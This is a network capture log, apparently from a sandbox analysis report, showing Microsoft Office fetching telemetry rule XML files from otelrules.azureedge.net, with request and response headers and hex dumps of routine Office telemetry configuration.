                                ETag: "0x8DC582BDDEB5124"
                                x-ms-request-id: b189b901-c01e-0079-3391-3fe51a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165158Z-174f7845968kvnqxhC1EWRmf3g0000000sw000000000xdt9
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:58 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                103192.168.2.55007213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:58 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:58 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:58 GMT
                                Content-Type: text/xml
                                Content-Length: 1366
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                ETag: "0x8DC582BDB779FC3"
                                x-ms-request-id: b7ec0bbd-e01e-0071-43ee-4408e7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165158Z-174f7845968swgbqhC1EWRmnb400000016cg000000009w9y
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:58 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                Session IDSource IPSource PortDestination IPDestination Port
                                104192.168.2.55007313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:00 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:00 GMT
                                Content-Type: text/xml
                                Content-Length: 1360
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                ETag: "0x8DC582BDD74D2EC"
                                x-ms-request-id: 9b9719a8-201e-0033-3491-3fb167000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165200Z-174f7845968ljs8phC1EWRe6en0000001630000000008er1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                105192.168.2.55007413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:00 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:01 GMT
                                Content-Type: text/xml
                                Content-Length: 1397
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BDFD43C07"
                                x-ms-request-id: 709a1193-501e-00a3-3559-43c0f2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165201Z-174f78459688l8rvhC1EWRtzr00000000kt000000000ggte
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                Session IDSource IPSource PortDestination IPDestination Port
                                106192.168.2.55007513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:00 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:01 GMT
                                Content-Type: text/xml
                                Content-Length: 1427
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                ETag: "0x8DC582BE56F6873"
                                x-ms-request-id: c562a2d5-001e-0082-3a33-445880000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165201Z-174f7845968glpgnhC1EWR7uec00000016d0000000008eez
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                Session IDSource IPSource PortDestination IPDestination Port
                                107192.168.2.55007613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:00 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:01 GMT
                                Content-Type: text/xml
                                Content-Length: 1390
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                ETag: "0x8DC582BE3002601"
                                x-ms-request-id: e52eaca9-401e-0064-32a1-4254af000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165201Z-174f78459684bddphC1EWRbht4000000160g000000004b16
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                Session IDSource IPSource PortDestination IPDestination Port
                                108192.168.2.55006413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:01 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:01 GMT
                                Content-Type: text/xml
                                Content-Length: 1405
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE12B5C71"
                                x-ms-request-id: 6df10516-501e-005b-5e01-42d7f7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165201Z-174f7845968xr5c2hC1EWRd0hn0000000r2000000000ck4h
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                Session IDSource IPSource PortDestination IPDestination Port
                                109192.168.2.55008013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:03 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:03 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:03 GMT
                                Content-Type: text/xml
                                Content-Length: 1364
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                ETag: "0x8DC582BEB6AD293"
                                x-ms-request-id: 20c5b054-901e-0016-7725-44efe9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165203Z-174f7845968swgbqhC1EWRmnb4000000168000000000uba1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:03 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                110192.168.2.55007913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:03 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:03 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:03 GMT
                                Content-Type: text/xml
                                Content-Length: 1354
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                ETag: "0x8DC582BE0662D7C"
                                x-ms-request-id: 80f7b3d9-401e-0083-53dd-41075c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165203Z-174f7845968cpnpfhC1EWR3afc00000015sg00000000n9v2
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:03 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                Session IDSource IPSource PortDestination IPDestination Port
                                111192.168.2.55007713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:03 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:03 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:03 GMT
                                Content-Type: text/xml
                                Content-Length: 1401
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                ETag: "0x8DC582BE2A9D541"
                                x-ms-request-id: e78111bd-301e-0020-4cf9-446299000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165203Z-174f7845968zgtf6hC1EWRqd8s0000000z3000000000q887
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:03 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                Session IDSource IPSource PortDestination IPDestination Port
                                112192.168.2.55007813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:03 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:04 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:03 GMT
                                Content-Type: text/xml
                                Content-Length: 1391
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                ETag: "0x8DC582BDF58DC7E"
                                x-ms-request-id: e071f9fb-501e-00a0-6a82-439d9f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165203Z-174f78459685726chC1EWRsnbg000000169g000000009cas
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:04 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                Session IDSource IPSource PortDestination IPDestination Port
                                113192.168.2.55008113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:04 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:04 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:04 GMT
                                Content-Type: text/xml
                                Content-Length: 1403
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                ETag: "0x8DC582BDCDD6400"
                                x-ms-request-id: bc5dfdd1-701e-005c-6a03-45bb94000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165204Z-174f7845968jrjrxhC1EWRmmrs000000169000000000mqd1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
